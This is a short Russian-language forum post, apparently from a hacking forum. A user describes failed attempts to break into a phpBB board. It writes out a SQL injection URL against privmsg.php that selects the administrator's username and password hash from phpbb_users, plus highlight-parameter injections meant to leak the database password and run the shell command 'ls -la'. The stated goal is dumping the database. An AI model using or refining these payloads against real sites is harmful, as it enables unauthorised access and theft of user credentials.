|
Новичок
Регистрация: 08.01.2005
Сообщений: 6
Провел на форуме: 0
Репутация:
0
|
|
Пробывал так:
privmsg.php?folder=savebox&mode=read&p=99& amp;pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0 ,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_level=1 LIMIT 1/*
При попытке закидывает на вход в систему
Пробывал так:
&highlight=%2527.$poster=$dbpasswd.%2527 ну естественно пробывал и пытался узнать $dbuser,$dbname,$dbname... при попытке открывается тема, но ник юзера так и остаётся, тоесть ни паса, ни логина, ни даже спецсимволов ничего нет....
p=123&highlight=%2527.$poster=%60ls%09-la%60.%2527
так тоже никакого рехультата, а значит и дамп базы я сделать тоже не могу...
ещё что-то пробывал, перерыл весь секьюрити лаб, пересмотрел все связаные с пхп видео на античате.... ничего не выходит...
|